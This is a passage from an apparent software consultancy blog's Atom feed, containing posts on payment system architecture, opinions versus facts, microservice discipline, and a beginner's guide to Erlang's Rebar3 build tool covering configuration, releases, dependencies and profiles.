&lt;p&gt;A payment system designed for a small number of transactions per month won’t survive at scale. Symptoms of bad scaling include database contention causing slow transactions, lack of idempotency leading to duplicate charges and refund loops, and an inflexible provider setup where a single outage halts all payments. As the business grows, every new customer isn’t just revenue-it’s additional strain on an already fragile system.&lt;/p&gt;
&lt;h2 id=&quot;fix-now-profit-later-the-bnpl-of-smart-architecture&quot; tabindex=&quot;-1&quot;&gt;Fix Now, Profit Later: The BNPL of Smart Architecture&lt;/h2&gt;
&lt;p&gt;Fixing the mess requires decoupling payment logic from business logic. Payments should be treated as an isolated service rather than tightly coupled logic spread across multiple modules. A well-designed architecture uses an event-driven model where a &amp;quot;payment_succeeded&amp;quot; event triggers order fulfillment, supports multiple providers without rewiring core business processes, and stores transaction states robustly to allow for retries and audits.&lt;/p&gt;
&lt;p&gt;Idempotency is non-negotiable (I cover this in more depth in &lt;a href=&quot;https://happihacking.com/blog/posts/2025/exacly_once/&quot;&gt;Why &amp;quot;Exactly Once&amp;quot; in Payments Is a Myth&lt;/a&gt;). Every transaction should be designed to be safely retried without causing duplicate charges. This means using unique transaction IDs for every operation, ensuring refunds and chargebacks don’t trigger unintended side effects, and implementing distributed locks or transactional guarantees where needed.&lt;/p&gt;
&lt;p&gt;No system is perfect, but good ones fail gracefully. Implementing automatic retries with exponential backoff, logging failures properly so debugging is possible, and proactively notifying customers when something goes wrong instead of waiting for them to complain are essential measures.&lt;/p&gt;
&lt;p&gt;Rather than embedding provider-specific code deep in the application, an abstraction layer should be used. This allows swapping payment providers without major rewrites, normalizes errors and response formats across gateways, and supports smart routing by sending high-risk transactions to providers with better fraud protection.&lt;/p&gt;
&lt;p&gt;Bad payment architecture is an invisible tax on every transaction, every support ticket, and every regulatory fine. Companies that invest in robust, scalable, and failure-tolerant payment systems don’t just improve reliability-they increase revenue, reduce costs, and future-proof their business. If your payment system is already showing cracks, the best time to fix it was yesterday. The second-best time is now.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Opinions: Just the Facts, 11 Years Later</title>
    <link href="https://happihacking.com/blog/posts/2025/opinions/"/>
    <updated>2025-02-19T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/opinions/</id>
    <summary>Still no opinions. Mostly.</summary>
    <content type="html">&lt;h1 id=&quot;opinions-just-the-facts-11-years-later&quot; tabindex=&quot;-1&quot;&gt;Opinions: Just the Facts, 11 Years Later&lt;/h1&gt;
&lt;p&gt;A decade ago, I wrote a &lt;a href=&quot;https://stenmans.org/happi_blog/?p=238&quot;&gt;blog post&lt;/a&gt; declaring my distaste for opinions. I preferred facts. I had only three opinions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I don’t like opinions.&lt;/li&gt;
&lt;li&gt;XSLT is a terrible programming language.&lt;/li&gt;
&lt;li&gt;Redefinable syntax like operation overloading and macros is evil.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;That post still holds up fairly well, but let’s revisit it with 11 years of hindsight. Have I softened? Have I embraced the messy subjectivity of the human condition? No. But I have refined my stance.&lt;/p&gt;
&lt;h2 id=&quot;the-problem-with-opinions&quot; tabindex=&quot;-1&quot;&gt;The Problem with Opinions&lt;/h2&gt;
&lt;p&gt;One of the things I originally hated about opinions was the expectation that everyone must have one on every topic. This still frustrates me. Not everything requires my input.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“What do you think of the new MacBook?” - It runs software. That’s its job.&lt;/li&gt;
&lt;li&gt;“What’s your take on [current geopolitical crisis]?” - I’m not a historian. My uninformed opinion is irrelevant.&lt;/li&gt;
&lt;li&gt;“Do you like this blouse?” - It’s red. You look fine. But you’d look fine in any color.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I still reject the idea that opinions should be formed without knowledge, and I still prefer to engage in conversations where &lt;strong&gt;evidence and reasoning&lt;/strong&gt; drive conclusions.&lt;/p&gt;
&lt;h2 id=&quot;but-some-opinions-are-useful&quot; tabindex=&quot;-1&quot;&gt;But… Some Opinions Are Useful&lt;/h2&gt;
&lt;p&gt;In 11 years, I’ve realized that some opinions are not just tolerable but &lt;strong&gt;necessary&lt;/strong&gt;. In particular:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Opinions as decision accelerators.&lt;/strong&gt; Sometimes, an opinion isn’t about being objectively correct-it’s about moving forward. If every architectural decision required unanimous factual consensus, nothing would ever ship.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Opinions as heuristics.&lt;/strong&gt; We can’t test everything ourselves. Some opinions are shortcuts based on &lt;strong&gt;pattern recognition and experience&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Opinions as cultural markers.&lt;/strong&gt; They define &lt;strong&gt;what matters in a team, a company, a language community.&lt;/strong&gt; “We value explicit over implicit” is an opinion, and that’s okay.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;the-facts-still-win&quot; tabindex=&quot;-1&quot;&gt;The Facts Still Win&lt;/h2&gt;
&lt;p&gt;But at the end of the day, opinions are &lt;strong&gt;not a substitute for facts&lt;/strong&gt;. We should challenge them, update them, and discard them when they no longer serve us. If an opinion can’t withstand scrutiny, it was never worth having in the first place.&lt;/p&gt;
&lt;p&gt;And yes, I still think XSLT is a terrible programming language, and that redefinable syntax is evil. Some opinions stand the test of time.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Microservices Are NOT an Excuse for Chaos</title>
    <link href="https://happihacking.com/blog/posts/2025/microsevices/"/>
    <updated>2025-02-18T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/microsevices/</id>
    <summary>How Overcomplicating Your Architecture Can Destroy Scalability Instead of Enabling It</summary>
    <content type="html">&lt;h1 id=&quot;microservices-are-not-an-excuse-for-chaos&quot; tabindex=&quot;-1&quot;&gt;Microservices Are NOT an Excuse for Chaos&lt;/h1&gt;
&lt;p&gt;Too many teams think &amp;quot;microservices&amp;quot; means &amp;quot;no rules.&amp;quot; The result? A distributed spaghetti mess-harder to debug, more expensive to operate, and a nightmare to scale.&lt;/p&gt;
&lt;p&gt;The promise of microservices is &lt;strong&gt;autonomy, scalability, and resilience.&lt;/strong&gt; But in practice, microservices can lead to &lt;strong&gt;data silos, inconsistent APIs, and operational nightmares&lt;/strong&gt; if not handled correctly.&lt;/p&gt;
&lt;h2 id=&quot;the-problem-unstructured-microservices-lead-to-complexity&quot; tabindex=&quot;-1&quot;&gt;The Problem: Unstructured Microservices Lead to Complexity&lt;/h2&gt;
&lt;p&gt;Teams often dive into microservices without understanding the trade-offs. Without structure, they introduce &lt;strong&gt;more problems than they solve:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;No clear data ownership&lt;/strong&gt; → Services fight over shared databases, causing unpredictable failures.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Inconsistent messaging patterns&lt;/strong&gt; → Some teams use REST, others gRPC, others RabbitMQ, with no unifying strategy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lack of observability&lt;/strong&gt; → Debugging across multiple services becomes an exercise in blind guessing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Service sprawl&lt;/strong&gt; → Every minor function becomes a separate service, leading to unnecessary overhead.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A poorly structured microservices architecture can be &lt;strong&gt;worse than a monolith&lt;/strong&gt; because it distributes complexity &lt;strong&gt;without a clear control mechanism.&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&quot;the-solution-structure-before-scale&quot; tabindex=&quot;-1&quot;&gt;The Solution: Structure Before Scale&lt;/h2&gt;
&lt;p&gt;Microservices work &lt;strong&gt;only when the fundamentals are in place:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Data Has Clear Owners&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Each service must own &lt;strong&gt;its own data.&lt;/strong&gt; Shared databases across services create &lt;strong&gt;hidden coupling&lt;/strong&gt; and make failure isolation impossible.&lt;/li&gt;
&lt;li&gt;Follow &lt;strong&gt;Domain-Driven Design (DDD)&lt;/strong&gt; to ensure that data boundaries match business logic.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;✅ &lt;strong&gt;Consistent Communication Patterns&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Define &lt;strong&gt;when to use APIs, event-driven messaging, or direct service-to-service calls.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;API contracts must be &lt;strong&gt;strictly defined and versioned&lt;/strong&gt; to prevent breaking changes.&lt;/li&gt;
&lt;li&gt;Event-driven architectures work-but only when &lt;strong&gt;events are properly modeled and handled.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;✅ &lt;strong&gt;Observability is Built-In&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Logs, metrics, and traces should be &lt;strong&gt;first-class citizens&lt;/strong&gt; in your architecture.&lt;/li&gt;
&lt;li&gt;Use &lt;strong&gt;OpenTelemetry, distributed tracing, and structured logging&lt;/strong&gt; to track service interactions.&lt;/li&gt;
&lt;li&gt;If you can’t trace a request &lt;strong&gt;across multiple services,&lt;/strong&gt; your system is already broken.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;the-hard-truth-microservices-arent-always-the-right-choice&quot; tabindex=&quot;-1&quot;&gt;The Hard Truth: Microservices Aren’t Always the Right Choice&lt;/h2&gt;
&lt;p&gt;If your team lacks &lt;strong&gt;operational maturity, well-defined domain boundaries, or clear integration strategies,&lt;/strong&gt; microservices will &lt;strong&gt;slow you down rather than speed you up.&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If your services &lt;strong&gt;still need to communicate frequently&lt;/strong&gt;, they aren’t microservices-they’re a &lt;strong&gt;distributed monolith&lt;/strong&gt; with extra network latency.&lt;/li&gt;
&lt;li&gt;If your deployment pipelines &lt;strong&gt;aren’t automated&lt;/strong&gt;, microservices will &lt;strong&gt;increase complexity, not reduce it.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;If your organization &lt;strong&gt;doesn’t have strong architectural discipline&lt;/strong&gt;, microservices will lead to fragmentation rather than agility.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;conclusion-build-microservices-with-purpose&quot; tabindex=&quot;-1&quot;&gt;Conclusion: Build Microservices With Purpose&lt;/h2&gt;
&lt;p&gt;Microservices aren’t an excuse to abandon structure. Done right, they provide &lt;strong&gt;fault isolation, independent scaling, and faster deployments.&lt;/strong&gt; Done wrong, they create &lt;strong&gt;distributed chaos.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Before breaking your monolith into microservices, ask yourself:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Do you have clear data ownership?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Are your communication patterns consistent?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Can you trace requests across the entire system?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If not, fix those first. Otherwise, you&#39;re just replacing &lt;strong&gt;a bad monolith with an even worse distributed system.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For a contrarian take on the monolith-vs-microservices debate, see &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the_monolith/&quot;&gt;Forget Microservices: Just Use Erlang&lt;/a&gt;. For guidance on structuring concurrent systems by domains and clear process responsibilities, see &lt;a href=&quot;https://happihacking.com/blog/posts/2024/designing_concurrency/&quot;&gt;Designing Concurrent Systems on the BEAM&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Getting the hang of Rebar3</title>
    <link href="https://happihacking.com/blog/posts/2025/rebar/"/>
    <updated>2025-01-07T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/rebar/</id>
    <content type="html">&lt;p&gt;&lt;a href=&quot;https://rebar3.org/&quot;&gt;Rebar3&lt;/a&gt; is the standard build tool and package
manager for the Erlang programming language. While the &lt;a href=&quot;https://rebar3.org/docs/&quot;&gt;official
documentation&lt;/a&gt; is pretty good, it can be hard for
a beginner to grasp what Rebar3 is really doing at times, and why; in
particular how profiles and releases and dependencies work, where the build
results end up, and so on.&lt;/p&gt;
&lt;p&gt;This guide assumes you already have &lt;a href=&quot;https://rebar3.org/docs/getting-started/&quot;&gt;installed Erlang and
Rebar&lt;/a&gt; and you understand the
basics of Erlang/OTP &lt;a href=&quot;https://adoptingerlang.org/docs/development/otp_applications/&quot;&gt;applications and their directory
structure&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;running&quot; tabindex=&quot;-1&quot;&gt;Running&lt;/h2&gt;
&lt;p&gt;Like most typical build tools, basic usage is just &lt;code&gt;rebar3 &amp;lt;command&amp;gt;&lt;/code&gt;, with
commands for instantiating a new project, compiling, running tests,
building a release package, etc.&lt;/p&gt;
&lt;p&gt;Common commands are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;rebar3 help&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 new&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 compile&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 shell&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 release&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 eunit&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 ct&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For the beginner, note that simply running &lt;code&gt;erl&lt;/code&gt; to launch Erlang will get
you an interactive Erlang shell but will not add your application to the
code path, unless you do so yourself with a flag like &lt;code&gt;-pa &amp;lt;ebin-dir&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Instead, use &lt;code&gt;rebar3 shell&lt;/code&gt; and Rebar3 will launch an Erlang shell with the
code path set up for you. This will also launch your Erlang applications in
the background according to your configuration, so that you can start
interacting with them (mainly for debugging). If you want to get a shell
without launching anything, use &lt;code&gt;rebar3 shell --start-clean&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For details on all the commands, see the &lt;a href=&quot;https://rebar3.org/docs/commands/&quot;&gt;official
documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;configuration&quot; tabindex=&quot;-1&quot;&gt;Configuration&lt;/h2&gt;
&lt;p&gt;Rebar3 reads the &lt;code&gt;rebar.config&lt;/code&gt; file to know what to do. This consists of
one or more plain Erlang tuples: &lt;code&gt;{...}&lt;/code&gt;, each terminated by a full stop
and newline, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{erl_opts, [debug_info]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These may contain numbers, double-quoted strings &lt;code&gt;&amp;quot;...&amp;quot;&lt;/code&gt;, symbols (&amp;quot;atoms&amp;quot;)
such as &lt;code&gt;erl_opts&lt;/code&gt;, lists &lt;code&gt;[...]&lt;/code&gt;, and other nested tuples.&lt;/p&gt;
&lt;p&gt;Apart from compilation options and other details, the &lt;code&gt;deps&lt;/code&gt; section of
this file lists dependencies (other Erlang apps which will be fetched
automatically):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{deps, [{getopt, &amp;quot;1.0.2&amp;quot;},
        {cowboy, {git, &amp;quot;https://github.com/ninenines/cowboy.git&amp;quot;,
                 {tag, &amp;quot;2.11.0&amp;quot;}}},
        ... ]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the &lt;code&gt;relx&lt;/code&gt; section defines how a Release (the package that you ship) is put
together:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{relx, [{release, { my_release, &amp;quot;1.0.2&amp;quot;},
         [my_app1, my_app2]},
        {include_erts, true},
        ... ]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and  the &lt;code&gt;profiles&lt;/code&gt; section specifies the different Rebar3 Profiles:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{profiles, [{prod, [... prod-specific-options ...
                   ]},
            {test, [... test-specific-options ...
                   ]},
           ]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In addition, if the file &lt;code&gt;rebar.config.script&lt;/code&gt; (an &lt;a href=&quot;https://www.erlang.org/doc/apps/erts/escript_cmd&quot;&gt;Erlang script&lt;/a&gt;) exists,
it will be executed by Rebar3 to perform dynamic configuration.&lt;/p&gt;
&lt;p&gt;There are many other things that can be configured. For a complete list,
see the &lt;a href=&quot;https://rebar3.org/docs/configuration/&quot;&gt;official documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;generated-files&quot; tabindex=&quot;-1&quot;&gt;Generated files&lt;/h2&gt;
&lt;p&gt;Rebar3 does not write into your source directories, and instead outputs all
generated files under a separate directory which by default is named
&lt;code&gt;_build/&lt;/code&gt;. It&#39;s always safe to delete the whole build directory and
recompile everything.&lt;/p&gt;
&lt;h2 id=&quot;source-files&quot; tabindex=&quot;-1&quot;&gt;Source files&lt;/h2&gt;
&lt;p&gt;Rebar3 expects that applications follow the standard &lt;a href=&quot;https://www.erlang.org/doc/system/applications.html#directory-structure&quot;&gt;Erlang application
structure&lt;/a&gt;.
A Rebar3 project can be either a single application with a &lt;code&gt;rebar.config&lt;/code&gt;
file in the project root directory and a &lt;code&gt;src/&lt;/code&gt; subdirectory, or it can
consist of a collection of applications in a subdirectory named &lt;code&gt;apps/&lt;/code&gt;
(alternatively &lt;code&gt;lib/&lt;/code&gt;), with the main &lt;code&gt;rebar.config&lt;/code&gt; in the root directory
and each app having its own &lt;code&gt;src/&lt;/code&gt;. Such a collection is called an
&amp;quot;umbrella project&amp;quot;.&lt;/p&gt;
&lt;p&gt;An umbrella application is usually published as a Release - a complete
Erlang system to run on some target machine. Often, only a top level
&lt;code&gt;rebar.config&lt;/code&gt; file is needed, but individual apps (&lt;code&gt;apps/app1/&lt;/code&gt;,
&lt;code&gt;apps/app2/&lt;/code&gt;, ...) may have their own &lt;code&gt;rebar.config&lt;/code&gt; files in order to use
individual build options, pre- or post-build hooks, etc.&lt;/p&gt;
&lt;p&gt;A single application can be made into a Release but it can also be
published as a standalone library (that others can use as a dependency), or
turned in to an &lt;em&gt;escript&lt;/em&gt; (a standalone executable).&lt;/p&gt;
&lt;h2 id=&quot;releases&quot; tabindex=&quot;-1&quot;&gt;Releases&lt;/h2&gt;
&lt;p&gt;A release is a package that can be installed and run on a target machine,
where the operator doesn&#39;t necessarily know anything about the
implementation. When Rebar3 builds a release, typically using a command
like&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;rebar3 as prod release
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;rebar3 as prod tar
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it puts the files under &lt;code&gt;_build/$PROFILE/rel/$RELNAME&lt;/code&gt;, where &lt;code&gt;$PROFILE&lt;/code&gt; in
this case would be &lt;code&gt;prod&lt;/code&gt; (see Profiles below) and &lt;code&gt;$RELNAME&lt;/code&gt; is taken from
the configuration. A typical release specification in your &lt;code&gt;rebar.config&lt;/code&gt;
looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{relx, [{release, { my_release, DEFAULT_VERSION_STRING },
         [app1, app2, ...]},
        {sys_config, &amp;quot;./config/sys.config&amp;quot;},
        {vm_args, &amp;quot;./config/vm.args&amp;quot;},
        {overlay, [{copy, &amp;quot;LICENSE&amp;quot; , &amp;quot;LICENSE&amp;quot;},
                   {copy, &amp;quot;docs/README.md&amp;quot;, &amp;quot;docs/REAME.md&amp;quot;}
                  ]}
       ]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A start script &lt;code&gt;bin/$RELNAME&lt;/code&gt; will be generated automatically, providing
standard CLI commands for your release, like &lt;code&gt;bin/my_release start&lt;/code&gt;. The
listed Erlang apps &lt;code&gt;[app1, app2, ...]&lt;/code&gt; will be included in the release
package and will be launched when the script runs, using the included
&lt;a href=&quot;https://www.erlang.org/docs/20/man/config.html&quot;&gt;&lt;code&gt;sys_config&lt;/code&gt;&lt;/a&gt; and
&lt;a href=&quot;https://www.erlang.org/doc/apps/erts/erl_cmd.html#args_file&quot;&gt;&lt;code&gt;vm_args&lt;/code&gt;&lt;/a&gt;
configuration files.&lt;/p&gt;
&lt;h2 id=&quot;external-dependencies&quot; tabindex=&quot;-1&quot;&gt;External Dependencies&lt;/h2&gt;
&lt;p&gt;Dependencies can be specified either just by name and version, as in
&lt;code&gt;{deps, [{gproc, &amp;quot;0.9.0&amp;quot;},...]}&lt;/code&gt;, in which case they are downloaded via the
&lt;a href=&quot;https://hex.pm/&quot;&gt;Hex package manager&lt;/a&gt;, or as a Git URL, as in &lt;code&gt;{deps, [{cowboy, {git, &amp;quot;https://github.com/ninenines/cowboy.git&amp;quot;, {tag,&amp;quot;2.11.0&amp;quot;}}},...]}&lt;/code&gt;, in which case they are checked out and built. See
Profiles below for details about where the code ends up.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note that listing an app as a dependency does not automatically include
it in the final Release package&lt;/strong&gt; - for that to happen, it must also be
included in the &lt;code&gt;relx&lt;/code&gt; specification (see above). For instance, libraries
only used for building or testing may be listed as dependencies but should
not be in the release spec.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The &lt;code&gt;relx&lt;/code&gt; section does not however need to list every app that should be
included in the Release.&lt;/strong&gt; Each individual app should contain a &lt;a href=&quot;https://www.erlang.org/doc/apps/kernel/app.html&quot;&gt;&lt;code&gt;*.app&lt;/code&gt;
metadata file&lt;/a&gt;, which
lists its specific startup dependencies &lt;code&gt;{applications, ...}&lt;/code&gt;, so if an
app &lt;code&gt;a&lt;/code&gt; declares that it has a runtime dependency on app &lt;code&gt;b&lt;/code&gt;, and Rebar3
has been told to include &lt;code&gt;a&lt;/code&gt;, it will automatically also include &lt;code&gt;b&lt;/code&gt;, and
so on, transitively, so that the Release package will always contain all
apps required for running.&lt;/p&gt;
&lt;p&gt;Conversely, listing an app in the release spec or a &lt;code&gt;*.app&lt;/code&gt; file does not
tell Rebar3 how to find and download that app if it is not part of your
source code - all external dependencies need to be declared in the &lt;code&gt;deps&lt;/code&gt;
section.&lt;/p&gt;
&lt;h3 id=&quot;dependency-pinning&quot; tabindex=&quot;-1&quot;&gt;Dependency pinning&lt;/h3&gt;
&lt;p&gt;When new dependencies have been fetched, Rebar3 updates the &lt;code&gt;rebar.lock&lt;/code&gt;
file with more exact information about the version, such as the Git hash,
not just the branch or tag name used in the &lt;code&gt;deps&lt;/code&gt; declaration. This
file should typically be kept under version control to ensure repeatable
builds. See the &lt;a href=&quot;https://www.rebar3.org/docs/configuration/dependencies/#lock-files&quot;&gt;Rebar3
documentation&lt;/a&gt;
for details.&lt;/p&gt;
&lt;h3 id=&quot;checkout-dependencies-locally-sourced-apps&quot; tabindex=&quot;-1&quot;&gt;Checkout dependencies - locally sourced apps&lt;/h3&gt;
&lt;p&gt;You can also create a subdirectory or symbolic link named &lt;code&gt;_checkouts&lt;/code&gt;,
containing apps or links to apps that you have as local files, maybe not
yet published or committed, such as a library that you&#39;re currently making
changes to. Apps found under &lt;code&gt;_checkouts&lt;/code&gt; take precedence over any other
apps with the same names, even if they already exist under &lt;code&gt;_build&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id=&quot;testing&quot; tabindex=&quot;-1&quot;&gt;Testing&lt;/h2&gt;
&lt;p&gt;There are two main test frameworks in Erlang:
&lt;a href=&quot;https://www.erlang.org/doc/apps/eunit/chapter.html&quot;&gt;EUnit&lt;/a&gt; for lightweight
unit tests, and &lt;a href=&quot;https://www.erlang.org/doc/apps/common_test/introduction.html&quot;&gt;Common
Test&lt;/a&gt; which
is more complex and can do system level testing. To run all EUnit tests in
your applications, say &lt;code&gt;rebar3 eunit&lt;/code&gt;. To run all tests written with Common
Test, say &lt;code&gt;rebar3 ct&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Rebar3 will ensure that the Erlang code path is set up to find both your
code and your test suites. You should put Common Test files in a separate
&lt;code&gt;test/&lt;/code&gt; subdirectory of each application. Note that if you want to run
Common Test test code interactively from an Erlang shell, you must start
the shell using the &lt;code&gt;test&lt;/code&gt; profile:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;rebar3 as test shell --start-clean
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so that Rebar3 will add code paths to the &lt;code&gt;test&lt;/code&gt; subdirectories. See below
for a full explanation of profiles.&lt;/p&gt;
&lt;p&gt;For an umbrella project, you can also place test files in a directory
&lt;code&gt;test/&lt;/code&gt; directly under the project root, for tests that pertain to the
project as a whole rather than to one of its individual apps.&lt;/p&gt;
&lt;p&gt;To run the
&lt;a href=&quot;https://www.erlang.org/doc/apps/dialyzer/dialyzer.html&quot;&gt;Dialyzer&lt;/a&gt; type
analysis tool, say &lt;code&gt;rebar3 dialyzer&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;You can define aliases in rebar.config to simplify common tasks like
running tests; for example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{alias, [{check, [dialyzer, eunit, ct]}]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;letting you say simply &lt;code&gt;rebar3 check&lt;/code&gt; to run all three.&lt;/p&gt;
&lt;h2 id=&quot;profiles&quot; tabindex=&quot;-1&quot;&gt;Profiles&lt;/h2&gt;
&lt;p&gt;The default profile simply means the &lt;code&gt;rebar.config&lt;/code&gt; without any specific
profile applied. This will be used when you just say e.g. &lt;code&gt;rebar3 compile&lt;/code&gt;.
To apply a profile such as &lt;code&gt;prod&lt;/code&gt; to a command, say &lt;code&gt;rebar3 as prod compile&lt;/code&gt;. You can use any profile names you like, but some names have
special meaning to Rebar3:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;prod&lt;/code&gt; profile will automatically apply the &lt;code&gt;prod&lt;/code&gt; &lt;strong&gt;mode&lt;/strong&gt; (see below).&lt;/li&gt;
&lt;li&gt;When running the commands &lt;code&gt;rebar3 eunit&lt;/code&gt; or &lt;code&gt;rebar3 ct&lt;/code&gt;, the profile
named &lt;code&gt;test&lt;/code&gt; will be automatically applied.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For example, if your tests require the &lt;code&gt;meck&lt;/code&gt; library to run, you can add
it as a dependency to only the test profile, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{profiles, [{test, [{deps, [meck]}]}]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id=&quot;where-do-the-files-go&quot; tabindex=&quot;-1&quot;&gt;Where do the files go?&lt;/h3&gt;
&lt;p&gt;When Rebar3 builds things, it puts the generated files under
&lt;code&gt;_build/$PROFILE/&lt;/code&gt;. For example, Erlang apps compiled with &lt;code&gt;rebar3 compile&lt;/code&gt;
end up under &lt;code&gt;_build/default/lib&lt;/code&gt;, but when compiled with &lt;code&gt;rebar3 as prod compile&lt;/code&gt; the files are placed under &lt;code&gt;_build/prod/lib&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;External dependencies, as specified in &lt;code&gt;{deps, ...}&lt;/code&gt;, are treated specially:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;They are &lt;em&gt;always built using their individual &lt;code&gt;prod&lt;/code&gt; profiles&lt;/em&gt;, no matter
what profile Rebar3 has been told to use currently.&lt;/li&gt;
&lt;li&gt;The files are placed under &lt;code&gt;_build/default/lib&lt;/code&gt; (rather than
&lt;code&gt;_build/prod/lib&lt;/code&gt;), because they should be available under the default
profile.&lt;/li&gt;
&lt;li&gt;When Rebar builds other profiles than the default, it does not rebuild
the external dependencies. Instead it creates symbolic links from
&lt;code&gt;_build/$PROFILE/lib&lt;/code&gt; to the already built files under
&lt;code&gt;_build/default/lib&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The exception is
dependencies specified as part of an individual profile, as in &lt;code&gt;{profiles, [{test, [{deps, [meck]}]}]}&lt;/code&gt;, which get stored under that profile (in this
case &lt;code&gt;_build/test/lib&lt;/code&gt;) since they should not be available under the
default profile.&lt;/p&gt;
&lt;p&gt;These locations are typically not the final destination for the compiled
files. Usually, they will later get copied into a Release package under
&lt;code&gt;_build/$PROFILE/rel&lt;/code&gt; for distribution as a tarball or similar.&lt;/p&gt;
&lt;h2 id=&quot;modes&quot; tabindex=&quot;-1&quot;&gt;Modes&lt;/h2&gt;
&lt;p&gt;Modes are shortcuts for some basic settings, for example &lt;code&gt;{mode, prod}&lt;/code&gt;
sets some typical options for production. The builtin modes are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;prod&lt;/code&gt;: Include the Erlang Runtime System in the release package, don&#39;t
include source code, and strip any debug information. Copy files into
the release package instead of using symbolic links.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;minimal&lt;/code&gt;: Like &lt;code&gt;prod&lt;/code&gt; but does not include the Erlang Runtime System.&lt;/li&gt;
